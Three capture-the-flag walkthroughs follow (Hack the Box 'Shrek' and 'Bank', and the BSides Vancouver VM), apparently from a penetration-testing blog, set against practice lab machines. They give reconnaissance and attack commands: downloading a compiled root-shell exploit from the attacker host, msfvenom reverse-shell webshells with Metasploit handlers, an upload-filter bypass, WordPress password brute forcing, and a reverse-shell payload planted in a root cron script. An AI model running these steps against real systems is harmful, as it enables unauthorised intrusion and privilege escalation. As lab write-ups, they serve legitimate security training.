Hack the Box Challenge: Shrek Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Shrek” which is available online for those who want to increase their skill in penetration testing and black box testing. Shrek is retried vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have collection of vulnerable labs as challenges from beginners to Expert level.

Level: Intermediate

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.47 so let’s begin with nmap port enumeration.

nmap -A 10.10.10.47                   

From given below image, you can observe we found port 21,22 and 80 are open in victim’s network.

As we know from the nmap scan that the target machine is running http on port 80, we use dirb to enumerate the directories.

dirb http://10.10.10.47

We first open the ip in our browser.

We open uploads/ directory that we found in the dirb scan and find a file called secret_ultimate.php.

Now we use wget to download the file into our system.

wget http://10.10.10.47/uploads/secret_ultimate.php

We open secret_ultimate.php and find a path to a directory called secret_area_51.

We open it in our browser and find an audio file in that directory.

We download into our system and use an online site called academo.org to analyse the spectrum, we find a hint to login through ftp using username donkey.

Further analysis of the audio file gives us the password to the username.

We login through ftp and find a few text files and a file simply called key.

We download the key and all the test files we use mget to mass download the txt files.

ftp> get key

ftp> mget *.txt

On our system as we can see all the files have been downloaded.

In the highlighted file above we found a base64 encoded string that were differentiated by space.

We decode the first base64 encoded string and find the decoded string to be ‘PrinceCharming’

In another file we find a base64 encoded string similarly differenctiated by space.

We decode the base64 encoded string and find a hexdecimal encoded string.

We use python to decode the hexadecimal string. We use seccure module and use ‘PrinceCharming’ as key to decode the string.

import seccure

string =”hexadecimal string”

print seccure.decrypt(string, “PrinceCharming”)

We open the key file and find that is a rsa key for ssh.

We use this key to login through using this rsa key. We use username as sec as we found earlier and use the passphrase we found before to login. As we login we go to /home/sec directory, in that directory we find a file called user.txt. When we open the file we get our first flag.

Going through the directories we find a file called thoughts.txt

We create a file called raj in this directory.

After a few minutes we find that it changed to root user and group.

Now to exploit the file we create a c program in our system that can give us the root.txt file in root directory. After creating the file we use SimpleHTTPServer module of python to transfer the file.

We now download the file into the target system using wget.

wget http://10.10.14.6:8000/shell.c

After downloading the file we compile the c program as rootshell.

gcc shell.c -o rootshell

We now wait for the system to change the user and group of the file. As soon as it changes the user and group of the file we run it and find the final flag.

Hack the Box Challenge: Bank Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Bank” which is categories as retried lab presented by Hack the Box for making online penetration practices. Solving challenges in this lab is not that much tough until you don’t have correct knowledge of Penetration testing. Let start and learn how to breach into a network then exploit it for retrieving desired information.

Level: Intermediate

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Bank is 10.10.10.29 so let’s initiate with nmap port enumeration.

nmap -A 10.10.10. 29

From given below image, you can observe we found ports 22, 53 and 80 are open in victim’s network. As you have seen in our all previous lab that we love to explore target IP via port 80 on our web browser, similarly we follow that traditinal in this also but Bad Luck!! this time it didn’t work at all.

Now the last option was to add target IP inside /etc/host file since port 53 was open for domain and as it is a challenge of hack the box thus I edit bank.htb as domain name.

Then I explore domain name: bank.htb through web browser and found following login page as shown below.

Then I preferred to use dirbuster tool and chose directory list 2-3 medium.txt file for directory brute force attack on http://bank.htb for php file extension.

Here I found so many directories but I was interested in support.php file. So when I try to explore http://bank.htb/support.php I was unable to access this web page as I was always redirect to login page due to http response 302.

So I installed noredirect plugin from firefox that allows to me stop any 302 redirections. I simply added http://bank.htb/login.php to the noredirect plugin so it can stop redirecting to /login.php consistently.

So now I’m able to access exact support.php page where I saw an upload option for uploading a php file hence we can try to upload php backdoor instead of a genuine php file.

Using msfvenom we had created a malicious shell.php file by executing following command.

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.6 lport=4444 -f raw

Simultaneously run multi/handler for reverse connection of victim’s system.

Then with the title shell I upload shell.php by adding “ignite” in the message box and click on submit. But failed to upload this file therefore without wasting time I simply intercept our browser HTTP request in Burpsuite.

From given below image you can observe that we had fetched intercepted http request of uploaded shell.php file.

After so many attempt I simply modify shell.php into shell.htb and forward the intercepted data.

YES!! It successfully get uploaded, then I run this file and move back to metasploit framework for meterpreter session.

After executing uploaded backdoor file come back to metsploit framework and wait for meterpreter session.

msf use exploit/multi/handler

msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) set lhost 10.10.14.6

msf exploit(multi/handler) set lport 4444

msf exploit(multi/handler) exploit

From given below image you can observe meterpreter session1 opened for accessing victim tty shell.

meterpreter>sysinfo

Now let’s finish the task by grabbing user.txt and root.txt file. First I move into /home directory and check available files and directories inside it.

cd home

ls

Here one directories chris, when I explore /home/chris I saw user.txt and use cat command for reading.

cd chris

ls

cat user.txt

Great!!  Here we had completed 1^st task now move to 2^nd tasK

Inside /var/ww/bank/uploads directory I checkout root privileges directory by executing following command.

find / -perm -4000 2>/dev/null

As result it dump so many directories have root privileges but I look at /var/htb/bin/emergency.

When I extract all directory here I found an emergency file which I had run for getting root access as shown below in image.

./emergency

id

Now let’s get the root.txt by executing following command.

cd /root

root.txt

We have successfully completed 2^nd task.

Hack the BSides Vancouver VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as BSides Vancouver. The credit for making this vm machine goes to “Abatchy” and it is another capture the flag challenge in which our goal is to gain root access and capture the flag to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let’s start from getting to know the IP of VM  with help of netdiscover Command (Here, I have it at 192.168.1.103 but you will have to find your own). Now let’s move towards enumeration in context to identify running services and open of victim’s machine by using the most popular tool Nmap.

nmap -p- -A 192.168.1.103 –open

Awesome!! Nmap has done remarkable job by dumbing the details of services running on open port 21, 22 and 80.

Moreover the highlighted text is reveling following details:

·         FTP Anonymous login allowed

·         Found a directory /backup wordpress with help of robot.txt

Without wasting time we accessed ftp service of victim’s system and found a user.txt.bk, let’s look into this file.

Its look like a text file with some username in it. Since port 22 is open so we can use these name for login into ssh if possible.

If you recall nmap result then it has shown /back_wordpress directory which we had explore in our web browser but Sadly we didn’t get anything from this web page although it sound for Wordpress site which is also a good sing.

Now we decided to use wpscan –u http://192.168.1.103 / –enumerate t –enumerate p –enumerate ucommand on the URL that we have entered in the browser. To check if there are any kind of vulnerable themes, plugins, username and etc.

The wpscan has enumerated the usernames where we have found the login credentials as admin and John.

Again we have used wpscan to find out the password credentials for the login credentials john. Here we have used following command to enumerate the password from the rockyou.txt file.

wpscan –u http://192.168.1.103/backup_wordpress –username john–wordlist /usr/share/wordlists/rockyou.txt

We see that for login credentials john, the password credentials matched is enigma.

After finding the username and password, we have used metasploit’s exploit wp_admin_shell_upload to upload the shell and get the meterpreter which is shown below.

use exploit/unix/webapp/wp_admin_shell_upload

msf exploit(unix/webapp/wp_admin_shell_upload) >set rhost 192.168.1.103

msf exploit(unix/webapp/wp_admin_shell_upload) >set targeturi /backup-wordpress

msf exploit(unix/webapp/wp_admin_shell_upload) >set username john

msf exploit(unix/webapp/wp_admin_shell_upload) >set password enigma

msf exploit(unix/webapp/wp_admin_shell_upload) >exploit

Great!! We had compromise confidentiality of the target’s system now penetrate more for completing this challenge.

We start penetrating targets machine and after 10-15 mints we came know about a cleanup file which has root privilege from inside contents of crontab file.

Then we downloaded cleanup file on our desktop so that we can modify it by editing our malicious code.

Meterpreter> download cleanup /root/Desktop

Using msfvenom we had generated a malicious python code by executing following command.

msfvenom -p cmd/unix/reverse_python lhost=192.168.1.108 lport=9876 R

Then copy the highlighted code for editing into cleanup file.

We had paste above copied text as inside cleanup file as shown in below image. In a new terminal we had start netcat for listening reverse connection.

nc -lvp 9876

Now we had transfer our malicious cleanup file into current directory i.e. /usr/local/bin and verify it using cat command.

Meterpreter> upload /root/Desktop/cleanup .

Meterpreter>cat cleanup

WOW we got reverse connection from victims system with root access now let’s catch the flag and finished the task.

id

cd /root

cat flag.txt

Solving challenge in this lab is not that much hectic therefore it is good task for beginners.